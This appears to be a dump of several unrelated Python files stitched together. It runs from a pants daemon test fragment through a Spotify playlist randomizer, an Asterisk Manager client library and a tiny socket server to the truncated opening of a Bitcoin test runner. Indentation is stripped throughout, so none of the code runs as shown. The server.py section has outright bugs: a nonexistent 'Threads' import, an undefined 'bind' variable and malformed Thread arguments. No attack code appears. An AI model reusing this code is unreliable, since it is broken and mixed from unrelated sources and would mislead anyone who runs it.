ctx.checker.assert_started()
self.assertIn(invalid_symbol, result.stderr)
finally:
rm_rf(test_path)
@unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654")
def test_pantsd_multiple_parallel_runs(self):
with self.pantsd_test_context() as (workdir, config, checker):
file_to_make = os.path.join(workdir, "some_magic_file")
waiter_handle = self.run_pants_with_workdir_without_waiting(
["run", "testprojects/src/python/coordinated_runs:waiter", "--", file_to_make],
workdir=workdir,
config=config,
)
checker.assert_started()
creator_handle = self.run_pants_with_workdir_without_waiting(
["run", "testprojects/src/python/coordinated_runs:creator", "--", file_to_make],
workdir=workdir,
config=config,
)
creator_handle.join().assert_success()
waiter_handle.join().assert_success()
@classmethod
def _launch_waiter(cls, workdir: str, config) -> Tuple[PantsJoinHandle, int, str]:
"""Launch a process via pantsd that will wait forever for the a file to be created.
Returns the pid of the pantsd client, the pid of the waiting child process, and the file to
create to cause the waiting child to exit.
"""
file_to_make = os.path.join(workdir, "some_magic_file")
waiter_pid_file = os.path.join(workdir, "pid_file")
argv = [
"run",
"testprojects/src/python/coordinated_runs:waiter",
"--",
file_to_make,
waiter_pid_file,
]
client_handle = cls.run_pants_with_workdir_without_waiting(
argv, workdir=workdir, config=config
)
waiter_pid = -1
for _ in attempts("The waiter process should have written its pid."):
waiter_pid_str = maybe_read_file(waiter_pid_file)
if waiter_pid_str:
waiter_pid = int(waiter_pid_str)
break
return client_handle, waiter_pid, file_to_make
def _assert_pantsd_keyboardinterrupt_signal(
self, signum: int, regexps: Optional[List[str]] = None
):
"""Send a signal to the thin pailgun client and observe the error messaging.
:param signum: The signal to send.
:param regexps: Assert that all of these regexps match somewhere in stderr.
"""
with self.pantsd_test_context() as (workdir, config, checker):
client_handle, waiter_process_pid, _ = self._launch_waiter(workdir, config)
client_pid = client_handle.process.pid
waiter_process = psutil.Process(waiter_process_pid)
assert waiter_process.is_running()
checker.assert_started()
# This should kill the client, which will cancel the run on the server, which will
# kill the waiting process.
os.kill(client_pid, signum)
client_run = client_handle.join()
client_run.assert_failure()
for regexp in regexps or []:
self.assertRegex(client_run.stderr, regexp)
# pantsd should still be running, but the waiter process should have been killed.
time.sleep(5)
assert not waiter_process.is_running()
checker.assert_running()
def test_pantsd_sigint(self):
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGINT,
regexps=["Interrupted by user."],
)
def test_sigint_kills_request_waiting_for_lock(self):
"""Test that, when a pailgun request is blocked waiting for another one to end, sending
SIGINT to the blocked run will kill it."""
config = {"GLOBAL": {"pantsd_timeout_when_multiple_invocations": -1, "level": "debug"}}
with self.pantsd_test_context(extra_config=config) as (workdir, config, checker):
# Run a process that will wait forever.
first_run_handle, _, file_to_create = self._launch_waiter(workdir, config)
checker.assert_started()
checker.assert_running()
# And another that will block on the first.
blocking_run_handle = self.run_pants_with_workdir_without_waiting(
command=["goals"], workdir=workdir, config=config
)
# Block until the second request is waiting for the lock.
time.sleep(10)
# Sends SIGINT to the run that is waiting.
blocking_run_client_pid = blocking_run_handle.process.pid
os.kill(blocking_run_client_pid, signal.SIGINT)
blocking_run_handle.join()
# Check that pantsd is still serving the other request.
checker.assert_running()
# Exit the second run by writing the file it is waiting for, and confirm that it
# exited, and that pantsd is still running.
safe_file_dump(file_to_create, "content!")
result = first_run_handle.join()
result.assert_success()
checker.assert_running()
def test_pantsd_unicode_environment(self):
with self.pantsd_successful_run_context(extra_env={"XXX": "¡"}) as ctx:
result = ctx.runner(["help"])
ctx.checker.assert_started()
result.assert_success()
# This is a regression test for a bug where we would incorrectly detect a cycle if two targets swapped their
# dependency relationship (#7404).
def test_dependencies_swap(self):
template = dedent(
"""
python_library(
name = 'A',
source = 'A.py',
{a_deps}
)
python_library(
name = 'B',
source = 'B.py',
{b_deps}
)
"""
)
with self.pantsd_successful_run_context() as ctx:
with temporary_dir(".") as directory:
safe_file_dump(os.path.join(directory, "A.py"), mode="w")
safe_file_dump(os.path.join(directory, "B.py"), mode="w")
if directory.startswith("./"):
directory = directory[2:]
def list_and_verify():
result = ctx.runner(["list", f"{directory}:"])
ctx.checker.assert_started()
result.assert_success()
expected_targets = {f"{directory}:{target}" for target in ("A", "B")}
self.assertEqual(expected_targets, set(result.stdout.strip().split("\n")))
with open(os.path.join(directory, "BUILD"), "w") as f:
f.write(template.format(a_deps='dependencies = [":B"],', b_deps=""))
list_and_verify()
with open(os.path.join(directory, "BUILD"), "w") as f:
f.write(template.format(a_deps="", b_deps='dependencies = [":A"],'))
list_and_verify()
def test_concurrent_overrides_pantsd(self):
"""Tests that the --concurrent flag overrides the --pantsd flag, because we don't allow
concurrent runs under pantsd."""
config = {"GLOBAL": {"concurrent": True, "pantsd": True}}
with temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir(
["help", "goals"], workdir=workdir, config=config
)
pants_run.assert_success()
pantsd_log_location = os.path.join(workdir, "pantsd", "pantsd.log")
self.assertFalse(os.path.exists(pantsd_log_location))
def test_unhandled_exceptions_only_log_exceptions_once(self):
"""Tests that the unhandled exceptions triggered by LocalPantsRunner instances don't
manifest as a PantsRunFinishedWithFailureException.
That is, that we unset the global Exiter override set by LocalPantsRunner before we try to log the exception.
This is a regression test for the most glaring case of https://github.com/pantsbuild/pants/issues/7597.
"""
with self.pantsd_run_context(success=False) as ctx:
result = ctx.runner(["run", "testprojects/src/python/bad_requirements:use_badreq"])
ctx.checker.assert_running()
result.assert_failure()
# Assert that the desired exception has been triggered once.
self.assertRegex(result.stderr, r"ERROR:.*badreq==99.99.99")
# Assert that it has only been triggered once.
self.assertNotIn(
"During handling of the above exception, another exception occurred:",
result.stderr,
)
self.assertNotIn(
"pants.bin.daemon_pants_runner._PantsRunFinishedWithFailureException: Terminated with 1",
result.stderr,
)
|
randomizer.py
|
import spotipy
import os
import spotipy.util as util
from http.server import HTTPServer, BaseHTTPRequestHandler
from threading import Thread
from random import shuffle
import requests
# os.environ["SPOTIPY_CLIENT_ID"] = ""
# os.environ["SPOTIPY_CLIENT_SECRET"] = ""
# os.environ["USER"] = ""
# os.environ["PLAYLISTS"] = ""
SERVER_PORT = 14523
os.environ["SPOTIPY_REDIRECT_URI"] = "http://localhost:{}".format(SERVER_PORT)
scope = 'user-library-read playlist-read-private playlist-read-collaborative playlist-modify-private playlist-modify-public'
class FailedAuth(BaseException):
"""Failed authentication for spotify"""
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class NotFound(BaseException):
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class MyHTTPHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write('<html><body><h1 style="text-align:center">Great! Now go back to the python program and insert the URL of this page:</h1><button onclick="copy()" style="margin: 0 auto;display:block">Copy to clipboard</button><textarea id="textarea" style="display: block; margin: 0 auto; width: 60%"></textarea><script>var txt = document.getElementById("textarea"); txt.value = window.location.href;txt.select();function copy() {txt.select();document.execCommand("copy");}</script></body></html>'.encode('utf-8'))
def log_message(self, format, *args):
return
class StoppableSilentHTTPServer(HTTPServer):
stopped = False
def __init__(self, *args, **kw):
HTTPServer.__init__(self, *args, **kw)
def serve_forever(self):
while not self.stopped:
self.handle_request()
def force_stop(self):
self.stopped = True
# Ensure a last run of the thread so it can exit
requests.get(url='http://localhost:14523')
self.server_close()
class SpotifyAuth:
def __init__(self, username):
self._username = username
self._sp = None
self.httpd = None
def wait_for_auth(self):
self.httpd = StoppableSilentHTTPServer(('', SERVER_PORT), MyHTTPHandler)
Thread(target=self.httpd.serve_forever).start()
token = util.prompt_for_user_token(self._username, scope)
if token:
self._sp = spotipy.Spotify(auth=token)
else:
raise FailedAuth
def get_spotify(self):
return self._sp
def stop_server(self):
self.httpd.force_stop()
def __list_add_tracks__(list_object, tracks):
for item in tracks["items"]:
track = item["track"]
if track["id"] is not None:
list_object.append(track["id"])
return list_object
def __add_playlist__(playlist_list, playlists):
for item in playlists["items"]:
playlist_list.append(item)
return playlist_list
def __chunk_list__(data, size):
return [data[x:x + size] for x in range(0, len(data), size)]
class SpotifyRandomizer:
""""Randomizes a playlist in spotify"""
def __init__(self, username, sp):
self._username = username
self._sp = sp
self._playlist = None
self._random_playlist_name = "{} (Randomized)"
def set_playlist_by_id(self, playlist_id):
try:
self._playlist = self._sp.user_playlist(self._username, playlist_id)
except BaseException:
raise NotFound("No playlist found")
if self._playlist is None:
raise NotFound("No playlist found")
def set_playlist_by_name(self, name):
self._playlist = self.__find_playlist__(name)
if self._playlist is None:
raise NotFound("No playlist found")
def __find_playlist__(self, name):
playlists = self.get_all_playlists()
for item in playlists:
if item["name"] == name:
return item
return None
def get_playlist_tracks(self, playlist=None):
if playlist is None:
playlist = self._playlist
track_list = []
result = self._sp.user_playlist(self._username, playlist["id"], fields="tracks,next")
tracks = result["tracks"]
track_list = __list_add_tracks__(track_list, tracks)
while tracks["next"]:
tracks = self._sp.next(tracks)
track_list = __list_add_tracks__(track_list, tracks)
return track_list
def __remove_all_tracks__(self, playlist):
if playlist is None:
return
tracks = self.get_playlist_tracks(playlist)
for chunk in __chunk_list__(tracks, 100):
self._sp.user_playlist_remove_all_occurrences_of_tracks(self._username, playlist["id"], chunk)
def __get_random_playlist__(self):
return self.__find_playlist__(self._random_playlist_name.format(self._playlist["name"]))
def __create_random_playlist__(self):
return self._sp.user_playlist_create(self._username,
self._random_playlist_name.format(self._playlist["name"]),
False)
def get_playlist_size(self, playlist=None):
if playlist is not None:
return playlist["tracks"]["total"]
elif self._playlist is not None:
return self._playlist["tracks"]["total"]
def add_tracks_to_playlist(self, tracks, playlist=None):
if playlist is None and self._playlist is not None:
playlist = self._playlist
elif self._playlist is None:
return
for chunk in __chunk_list__(tracks, 100):
self._sp.user_playlist_add_tracks(self._username, playlist["id"], chunk)
def randomize_playlist(self):
if self._playlist is None:
raise TypeError
random_playlist = self.__get_random_playlist__()
if random_playlist is None:
random_playlist = self.__create_random_playlist__()
if self.get_playlist_size(random_playlist) > 1:
# Just in case, so the playlist randomized never gets deleted due to a bug again.
if random_playlist['id'] == self._playlist['id']:
print("FATAL ERROR: Program tried to erase original playlist due to a bug. Please report this behaviour.")
return
self.__remove_all_tracks__(random_playlist)
tracks = self.get_playlist_tracks()
shuffle(tracks)
self.add_tracks_to_playlist(tracks, random_playlist)
def get_all_playlists(self):
playlist_list = []
playlists = self._sp.user_playlists(self._username)
__add_playlist__(playlist_list, playlists)
while playlists["next"]:
playlists = self._sp.next(playlists)
__add_playlist__(playlist_list, playlists)
return playlist_list
|
manager.py
|
#!/usr/bin/env python
# vim: set expandtab shiftwidth=4:
"""
Python Interface for Asterisk Manager
This module provides a Python API for interfacing with the asterisk manager.
import py_star.manager
import sys
def handle_shutdown(event, manager):
print ("Received shutdown event")
manager.close()
# we could analyze the event and reconnect here
def handle_event(event, manager):
print ("Received event: %s" % event.name)
manager = py_star.manager.Manager()
try:
# connect to the manager
try:
manager.connect('host')
manager.login('user', 'secret')
# register some callbacks
manager.register_event('Shutdown', handle_shutdown) # shutdown
manager.register_event('*', handle_event) # catch all
# get a status report
response = manager.status()
manager.logoff()
except py_star.manager.ManagerSocketException as err:
errno, reason = err
print ("Error connecting to the manager: %s" % reason)
sys.exit(1)
except py_star.manager.ManagerAuthException as reason:
print ("Error logging in to the manager: %s" % reason)
sys.exit(1)
except py_star.manager.ManagerException as reason:
print ("Error: %s" % reason)
sys.exit(1)
finally:
# remember to clean up
manager.close()
Remember all header, response, and event names are case sensitive.
Not all manager actions are implmented as of yet, feel free to add them
and submit patches.
"""
from __future__ import absolute_import, print_function, unicode_literals
import logging
import os
import socket
import sys
import threading
from . import compat_six as six
from six.moves import queue
logger = logging.getLogger(__name__)
EOL = '\r\n'
class _Message(object):
def __init__(self):
self.headers = {}
def has_header(self, hname):
"""Check for a header"""
return hname in self.headers
def get_header(self, hname, defval=None):
"""Return the specified header"""
return self.headers.get(hname, defval)
def __getitem__(self, hname):
"""Return the specified header"""
return self.headers[hname]
def __repr__(self):
return self.headers['Response']
# backwards compatibilty
_Msg = _Message
class ManagerMessage(_Message):
"""A manager interface message"""
def __init__(self, response):
super(ManagerMessage, self).__init__()
# the raw response, straight from the horse's mouth:
self.response = response
self.data = ''
self.multiheaders = {}
# parse the response
self.parse(response)
# This is an unknown message, may happen if a command (notably
# 'dialplan show something') contains a \n\r\n sequence in the
# middle of output. We hope this happens only *once* during a
# misbehaved command *and* the command ends with --END COMMAND--
# in that case we return an Event. Otherwise we asume it is
# from a misbehaving command not returning a proper header (e.g.
# IAXnetstats in Asterisk 1.4.X)
# A better solution is probably to retain some knowledge of
# commands sent and their expected return syntax. In that case
# we could wait for --END COMMAND-- for 'command'.
# B0rken in asterisk. This should be parseable without context.
if 'Event' not in self.headers and 'Response' not in self.headers:
# there are commands that return the ActionID but not
# 'Response', e.g., IAXpeers in Asterisk 1.4.X
if self.has_header('ActionID'):
self.headers['Response'] = 'Generated Header'
self.multiheaders['Response'] = ['Generated Header']
elif '--END COMMAND--' in self.data:
self.headers['Event'] = 'NoClue'
self.multiheaders['Event'] = ['NoClue']
else:
self.headers['Response'] = 'Generated Header'
self.multiheaders['Response'] = ['Generated Header']
def parse(self, response):
"""Parse a manager message"""
data = []
for n, line in enumerate(response):
# all valid header lines end in \r\n
if not line.endswith('\r\n'):
data.extend(response[n:])
break
try:
k, v = (x.strip() for x in line.split(':', 1))
if k not in self.multiheaders:
self.multiheaders[k] = []
self.headers[k] = v
self.multiheaders[k].append(v)
except ValueError:
# invalid header, start of multi-line data response
data.extend(response[n:])
break
self.data = ''.join(data)
# backwards compatibilty
ManagerMsg = ManagerMessage
class Event(_Message):
"""Manager interface Events, __init__ expects and 'Event' message"""
def __init__(self, message):
super(Event, self).__init__()
# store all of the event data
self.message = message
self.data = message.data
self.headers = message.headers
self.multiheaders = message.multiheaders
# if this is not an event message we have a problem
if not message.has_header('Event'):
raise ManagerException('Trying to create event from non event message')
# get the event name
self.name = message.get_header('Event')
def __repr__(self):
return self.headers['Event']
def get_action_id(self):
return self.headers.get('ActionID', 0000)
class Manager(object):
"""Manager interface.
Queue :attr:`errors_in_threads` stores messages about errors that
happened in threads execution. Because there is no point in raising
exceptions in threads, this is a way of letting the users of this
class know that something bad has happened.
.. warning::
Errors happening in threads must be logged **and** a corresponding
message added to :attr:`errors_in_threads`.
"""
def __init__(self):
self._sock = None # our socket
self.title = None # set by received greeting
self._connected = threading.Event()
self._running = threading.Event()
# our hostname
self.hostname = socket.gethostname()
# pid -- used for unique naming of ActionID
self.pid = os.getpid()
# our queues
self._message_queue = queue.Queue()
self._response_queue = queue.Queue()
self._event_queue = queue.Queue()
self.errors_in_threads = queue.Queue()
# callbacks for events
self._event_callbacks = {}
self._response_waiters = [] # those who are waiting for a response
# sequence stuff
self._seqlock = threading.Lock()
self._seq = 0
# some threads
self.message_thread = threading.Thread(target=self.message_loop)
self.event_dispatch_thread = threading.Thread(target=self.event_dispatch)
# TODO: this can be passed when threads are created
self.message_thread.setDaemon(True)
self.event_dispatch_thread.setDaemon(True)
# special sentinel value: when placed in a queue, its consumers
# know they have to terminate
self._sentinel = object()
def __del__(self):
self.close()
def is_connected(self):
"""
Check if we are connected or not.
"""
return self._connected.isSet()
# backwards compatibilty
connected = is_connected
def is_running(self):
"""Return whether we are running or not."""
return self._running.isSet()
def next_seq(self):
"""Return the next number in the sequence, this is used for ActionID"""
self._seqlock.acquire()
try:
return self._seq
finally:
self._seq += 1
self._seqlock.release()
def send_action(self, cdict=None, **kwargs):
"""
Send a command to the manager
If a list is passed to the cdict argument, each item in the list will
be sent to asterisk under the same header in the following manner:
cdict = {"Action": "Originate",
"Variable": ["var1=value", "var2=value"]}
send_action(cdict)
...
Action: Originate
Variable: var1=value
Variable: var2=value
"""
cdict = cdict or {}
if not self.is_connected():
raise ManagerException("Not connected")
# fill in our args
cdict.update(kwargs)
# set the action id
if 'ActionID' not in cdict:
cdict['ActionID'] = '%s-%04s-%08x' % (
self.hostname, self.pid, self.next_seq())
clist = []
# generate the command
for key, value in cdict.items():
if isinstance(value, list):
for item in value:
item = tuple([key, item])
clist.append('%s: %s' % item)
else:
item = tuple([key, value])
clist.append('%s: %s' % item)
clist.append(EOL)
command = EOL.join(clist)
# lock the socket and send our command
try:
self._sock.write(command.encode('utf-8'))
self._sock.flush()
logger.debug("Wrote to socket file this command:\n%s" % command)
except socket.error as err:
errno, reason = err
raise ManagerSocketException(errno, reason)
self._response_waiters.insert(0, 1)
response = self._response_queue.get()
self._response_waiters.pop(0)
# if we got the sentinel value as a response we are done
if response is self._sentinel:
raise ManagerSocketException(0, 'Connection Terminated')
return response
def _receive_data(self):
"""
Read the response from a command.
"""
multiline = False
wait_for_marker = False
eolcount = 0
# loop while we are sill running and connected
while self.is_running() and self.is_connected():
try:
lines = []
for line in self._sock:
line = line.decode('utf-8')
# check to see if this is the greeting line
if not self.title and '/' in line and ':' not in line:
# store the title of the manager we are connecting to:
self.title = line.split('/')[0].strip()
# store the version of the manager we are connecting to:
self.version = line.split('/')[1].strip()
# fake message header
lines.append('Response: Generated Header\r\n')
lines.append(line)
logger.debug("Fake message header. Will exit the "
"socket file iteration loop")
break
# If the line is EOL marker we have a complete message.
# Some commands are broken and contain a \n\r\n
# sequence, in the case wait_for_marker is set, we
# have such a command where the data ends with the
# marker --END COMMAND--, so we ignore embedded
# newlines until we see that marker
if line == EOL and not wait_for_marker:
multiline = False
# we split the break conditions because they are of very
# different nature and we'd like more fine-grained logs
if lines:
logger.debug("Have %s lines. Will exit the socket "
"file iteration loop" % len(lines))
break
if not self.is_connected():
logger.warning("Not connected. Will exit the "
"socket file iteration loop")
break
# ignore empty lines at start
continue
lines.append(line)
# line not ending in \r\n or without ':' isn't a
# valid header and starts multiline response
if not line.endswith('\r\n') or ':' not in line:
multiline = True
# Response: Follows indicates we should wait for end
# marker --END COMMAND--
if (not multiline and line.startswith('Response') and
line.split(':', 1)[1].strip() == 'Follows'):
wait_for_marker = True
# same when seeing end of multiline response
if multiline and line.startswith('--END COMMAND--'):
wait_for_marker = False
multiline = False
if not self.is_connected():
logger.info("Not connected. Will exit the "
"socket file iteration loop")
break
else:
# EOF during reading
logger.error("Problem reading socket file")
self._sock.close()
logger.info("Closed socket file")
self._connected.clear()
# if we have a message append it to our queue
# else notify `message_loop` that it has to finish
if lines:
if self.is_connected():
self._message_queue.put(lines)
else:
msg = "Received lines but are not connected"
logger.warning(msg)
self._message_queue.put(self._sentinel)
self.errors_in_threads.put(msg)
else:
msg = "No lines received"
logger.warning(msg)
self._message_queue.put(self._sentinel)
self.errors_in_threads.put(msg)
except socket.error:
msg = "Socket error"
logger.exception(msg)
self._sock.close()
logger.info("Closed socket file")
self._connected.clear()
# notify `message_loop` that it has to finish
self._message_queue.put(self._sentinel)
self.errors_in_threads.put(msg)
def register_event(self, event, function):
"""
Register a callback for the specfied event.
If a callback function returns True, no more callbacks for that
event will be executed.
"""
# get the current value, or an empty list
# then add our new callback
current_callbacks = self._event_callbacks.get(event, [])
current_callbacks.append(function)
self._event_callbacks[event] = current_callbacks
def unregister_event(self, event, function):
"""
Unregister a callback for the specified event.
"""
current_callbacks = self._event_callbacks.get(event, [])
current_callbacks.remove(function)
self._event_callbacks[event] = current_callbacks
def message_loop(self):
"""
The method for the event thread.
This actually recieves all types of messages and places them
in the proper queues.
"""
# start a thread to receive data
t = threading.Thread(target=self._receive_data)
t.setDaemon(True)
t.start()
try:
# loop getting messages from the queue
while self.is_running():
# get/wait for messages
data = self._message_queue.get()
# if we got the sentinel value as our message we are done
# (have to notify `_event_queue` once, and `_response_queue`
# as many times as the length of `_response_waiters`)
if data is self._sentinel:
logger.info("Got sentinel object. Will notify the other "
"queues and then break this loop")
# notify `event_dispatch` that it has to finish
self._event_queue.put(self._sentinel)
for waiter in self._response_waiters:
self._response_queue.put(self._sentinel)
break
# parse the data
message = ManagerMessage(data)
# check if this is an event message
if message.has_header('Event'):
self._event_queue.put(Event(message))
# check if this is a response
elif message.has_header('Response'):
self._response_queue.put(message)
else:
# notify `_response_queue`'s consumer (`send_action`)
# that it has to finish
msg = "No clue what we got\n%s" % message.data
logger.error(msg)
self._response_queue.put(self._sentinel)
self.errors_in_threads.put(msg)
except Exception:
logger.exception("Exception in the message loop")
six.reraise(*sys.exc_info())
finally:
# wait for our data receiving thread to exit
logger.debug("Waiting for our data-receiving thread to exit")
t.join()
def event_dispatch(self):
"""This thread is responsible for dispatching events"""
# loop dispatching events
while self.is_running():
# get/wait for an event
ev = self._event_queue.get()
# if we got the sentinel value as an event we are done
if ev is self._sentinel:
logger.info("Got sentinel object. Will break dispatch loop")
break
# dispatch our events
# first build a list of the functions to execute
callbacks = (self._event_callbacks.get(ev.name, []) +
self._event_callbacks.get('*', []))
# now execute the functions
for callback in callbacks:
if callback(ev, self):
break
def connect(self, host, port=5038):
"""Connect to the manager interface"""
if self.is_connected():
raise ManagerException('Already connected to manager')
# make sure host is a string
assert isinstance(host, six.string_types)
port = int(port) # make sure port is an int
# create our socket and connect
try:
_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_sock.connect((host, port))
self._sock = _sock.makefile(mode='rwb')
_sock.close()
except socket.error as err:
errno, reason = err
raise ManagerSocketException(errno, reason)
# we are connected and running
self._connected.set()
self._running.set()
# start the event thread
self.message_thread.start()
# start the event dispatching thread
self.event_dispatch_thread.start()
# get our initial connection response
response = self._response_queue.get()
# if we got the sentinel value as a response then something went awry
if response is self._sentinel:
raise ManagerSocketException(0, "Connection Terminated")
return response
def close(self):
"""Shutdown the connection to the manager"""
# if we are still running, logout
if self.is_running() and self.is_connected():
logger.debug("Logoff before closing (we are running and connected)")
self.logoff()
if self.is_running():
# notify `message_loop` that it has to finish
logger.debug("Notify message loop that it has to finish")
self._message_queue.put(self._sentinel)
# wait for the event thread to exit
logger.debug("Waiting for `message_thread` to exit")
self.message_thread.join()
# make sure we do not join our self (when close is called from event handlers)
if threading.currentThread() != self.event_dispatch_thread:
# wait for the dispatch thread to exit
logger.debug("Waiting for `event_dispatch_thread` to exit")
self.event_dispatch_thread.join()
self._running.clear()
# Manager actions
def login(self, username, secret):
"""Login to the manager, throws ManagerAuthException when login falis.
:return: action response
"""
cdict = {
'Action': 'Login',
'Username': username,
'Secret': secret,
}
response = self.send_action(cdict)
if response.get_header('Response') == 'Error':
raise ManagerAuthException(response.get_header('Message'))
return response
def ping(self):
"""Send a ping action to the manager.
:return: action response
"""
cdict = {'Action': 'Ping'}
return self.send_action(cdict)
def logoff(self):
"""Logoff from the manager.
:return: action response
"""
cdict = {'Action': 'Logoff'}
return self.send_action(cdict)
def hangup(self, channel):
"""Hangup the specified channel.
:return: action response
"""
cdict = {
'Action': 'Hangup',
'Channel': channel,
}
return self.send_action(cdict)
def status(self, channel=''):
"""Get a status message from asterisk.
:return: action response
"""
cdict = {
'Action': 'Status',
'Channel': channel,
}
return self.send_action(cdict)
def redirect(self, channel, exten, priority='1', extra_channel='', context=''):
"""Redirect a channel.
:return: action response
"""
cdict = {
'Action': 'Redirect',
'Channel': channel,
'Exten': exten,
'Priority': priority,
}
if context:
cdict['Context'] = context
if extra_channel:
cdict['ExtraChannel'] = extra_channel
return self.send_action(cdict)
def originate(self, channel, exten, context='', priority='', timeout='',
caller_id='', async=False, account='', variables=None):
"""Originate a call.
:return: action response
"""
variables = variables or {}
cdict = {
'Action': 'Originate',
'Channel': channel,
'Exten': exten,
}
if context:
cdict['Context'] = context
if priority:
cdict['Priority'] = priority
if timeout:
cdict['Timeout'] = timeout
if caller_id:
cdict['CallerID'] = caller_id
if async:
cdict['Async'] = 'yes'
if account:
cdict['Account'] = account
if variables:
cdict['Variable'] = ['='.join((str(key), str(value)))
for key, value in variables.items()]
return self.send_action(cdict)
def mailbox_status(self, mailbox):
"""Get the status of the specfied mailbox.
:return: action response
"""
cdict = {
'Action': 'MailboxStatus',
'Mailbox': mailbox,
}
return self.send_action(cdict)
def command(self, command):
"""Execute a command.
:return: action response
"""
cdict = {
'Action': 'Command',
'Command': command,
}
return self.send_action(cdict)
def extension_state(self, exten, context):
"""Get the state of an extension.
:return: action response
"""
cdict = {
'Action': 'ExtensionState',
'Exten': exten,
'Context': context,
}
return self.send_action(cdict)
def playdtmf(self, channel, digit):
"""Plays a dtmf digit on the specified channel.
:return: action response
"""
cdict = {
'Action': 'PlayDTMF',
'Channel': channel,
'Digit': digit,
}
return self.send_action(cdict)
def absolute_timeout(self, channel, timeout):
"""Set an absolute timeout on a channel.
:return: action response
"""
cdict = {
'Action': 'AbsoluteTimeout',
'Channel': channel,
'Timeout': timeout,
}
return self.send_action(cdict)
def mailbox_count(self, mailbox):
cdict = {
'Action': 'MailboxCount',
'Mailbox': mailbox,
}
return self.send_action(cdict)
def sippeers(self):
cdict = {'Action': 'Sippeers'}
return self.send_action(cdict)
def sipshowpeer(self, peer):
cdict = {
'Action': 'SIPshowpeer',
'Peer': peer,
}
return self.send_action(cdict)
class ManagerException(Exception):
pass
class ManagerSocketException(ManagerException):
pass
class ManagerAuthException(ManagerException):
pass
|
server.py
|
#/usr/bin/env python3.4
from threading import Threads
import time
from socket import *
host = ''
port = 50007
sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.bind((host, bind))
sockobj.listen(5)
def run():
return time.ctime(time.time())
def handleClient():
time.sleep(5)
while True :
data = connection.recv(1024)
if not data : break
reply = ' Reply => %s at %s ' %(data, run())
connection.send(reply)
connection.close()
def main():
while True:
connection, address = sockobj.accept()
print("Server is connected at : " + address + " at : " + run())
t = Thread(target = handleClient, args(connection, ))
t.start()
main()
|
test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
import logging
import xml.etree.ElementTree as ET
import json
import threading
import multiprocessing
from queue import Queue, Empty
# Formatting. Default colors to empty strings.
BOLD, BLUE, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
BLUE = ('\033[0m', '\033[0;34m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
TEST_PARAMS = {
# Some test can be run with additional parameters.
# When a test is listed here, the it will be run without parameters
# as well as with additional parameters listed here.
# This:
# example "testName" : [["--param1", "--param2"] , ["--param3"]]
# will run the test 3 times:
# testName
# testName --param1 --param2
# testname --param3
"wallet_txn_doublespend.py": [["--mineblock"]],
"wallet_txn_clone.py": [["--mineblock"]],
"wallet_multiwallet.py": [["--usecli"]],
}
# Used to limit the number of tests, when list of tests is not provided on command line
# When --extended is specified, we run all tests, otherwise
# we only run a test if its execution time in seconds does not exceed EXTENDED_CUTOFF
DEFAULT_EXTENDED_CUTOFF = 40
DEFAULT_JOBS = (multiprocessing.cpu_count() // 3) + 1
class TestCase():
"""
Data structure to hold and run information necessary to launch a test case.
"""
def __init__(self, test_num, test_case, tests_dir, tmpdir, flags=None):
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_case = test_case
self.test_num = test_num
self.flags = flags
def run(self, portseed_offset):
t = self.test_case
portseed = self.test_num + portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = t.split()
testdir = os.path.join("{}", "{}_{}").format(
self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
name = t
time0 = time.time()
process = subprocess.Popen([os.path.join(self.tests_dir, test_argv[0])] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr)
process.wait()
log_stdout.seek(0), log_stderr.seek(0)
[stdout, stderr] = [l.read().decode('utf-8')
for l in (log_stdout, log_stderr)]
log_stdout.close(), log_stderr.close()
if process.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif process.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
return TestResult(self.test_num, name, testdir, status, int(time.time() - time0), stdout, stderr)
def on_ci():
return os.getenv('TRAVIS') == 'true' or os.getenv('TEAMCITY_VERSION') != None
def main():
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "config.ini")
config.read_file(open(configfile))
src_dir = config["environment"]["SRCDIR"]
build_dir = config["environment"]["BUILDDIR"]
tests_dir = os.path.join(src_dir, 'test', 'functional')
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
